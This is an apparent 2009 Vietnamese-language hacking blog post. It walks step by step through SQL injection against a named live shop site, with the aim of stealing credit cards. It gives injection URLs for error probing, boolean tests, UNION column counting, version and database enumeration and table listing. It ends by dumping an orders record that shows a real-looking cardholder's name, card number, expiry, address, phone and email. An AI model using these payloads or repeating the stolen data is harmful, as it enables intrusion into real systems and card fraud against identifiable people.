hack shop php mysql injection 5.0

victim: https://www.185elgin.com/customer_te…timonial_id=25

Quote:
1064 – You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘\” at line 1

select * FROM customer_testimonials WHERE testimonials_id = 25\’

de nhan biet loi nay co hack dc nua ko ta querry them 1 chut nay de nhan biet dc

https://www.185elgin.com/customer_te…timonial_id=25 and 1=1/*

bat ra 1 page voi gia tri true = 1

https://www.185elgin.com/customer_te…timonial_id=25 and 1=0/*

bat ra 1 page voi gia tri false = 0

anh em du dk tren thi tien hanh hack site nha’

bay gio ta di tim site nay co bao nhieu colum de khai thac ra loi

https://www.185elgin.com/customer_te…,3,4,5,6,7,8–

Querry từ 1-8 nhảy ra lỗi này

Quote:
nhay ra loi 3&6 ta lay o vi tri so 3 nhe
3

6

Đinh vị lấy số 3 làm tâm điểm như dưới nha !

bay gio ta tim xem phien ban mysql cua site nay la bao nhieu de tuy bien khai thac nhe

ta nen dung ham concat_ws(0x3a,version(),user(),database() de tim nhe

https://www.185elgin.com/customer_te…)),4,5,6,7,8–

nhu vay la ver mysql 5.0.xx

Quote:
5.0.51a-community:sendmc2_script@localhost:sendmc2_185elgi n

den day ta co the khai thac theo kieu inject mysql 5.0 roai

ta di tim table dau tien cua site nhe

https://www.185elgin.com/customer_te…0limit%201,1–

Quote:
ra tiep table dau tien la: COLLATIONS

Meo nho cho cac tester luoi querry ra tung table mot ta lam nhu sau

https://www.185elgin.com/customer_te…chema.tables–

Quote:

CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_ APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN _USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEG ES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVI LEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,address_book, address_format,banners,banners_history,card_surcha rges,categories,categories_description,configurati on,configuration_group,counter,counter_history,cou ntries,currencies,customer_testimonials,customers, customers_basket,customers_basket_attributes,custo mers_info,geo_zones,languages,link_categories,link _categories_description,links,links_check,links_de scription,links_featured,links_status,links_to_lin k_categories,manufacturers,manufacturers_info,news letters,orders,orders_maxmind,orders_products,orde rs_products_attributes,orders_products_download,or ders_status,orders_status_history,orders_total,pro ducts,products_attributes,products_attributes_down load,products_description,products_notifications,p roducts_options,products_options_values,products_o ptions_values_to_product

do the la ta da co table dau tien va cac cac tables cua site roi.

bay gio ta tien hanh tim table nao co chua cc nha :d

ta tien hanh querry lay tat ca cc tu table orders xem nhe’

truoc tien phai convert sang dang hex nhe

ta vao day http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
convert orders ra cai nay 0x6F7264657273

https://www.185elgin.com/customer_te…0x6F7264657273

Quote:
orders_id

6
Click here to view all testimonials

Testimonial by 4
customers_id

6
Click here to view all testimonials

Testimonial by 4
customers_name

6
Click here to view all testimonials

…………………………………….

Xong roi day ta lay nhung info can thiet de get cc nao

https://www.185elgin.com/customer_te…+from+orders–

Quote:

8/American Express/Alexander Cassini/371382972132008/1207/2523 3rd street//Santa Monica/90405/California/United States/310-560-1803/acassini@aol.com/2005-10-20 12:27:23

This entry was posted on Friday, December 11th, 2009 and is filed under Hack. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
«
»

Leave a Reply

You must be logged in to post a comment.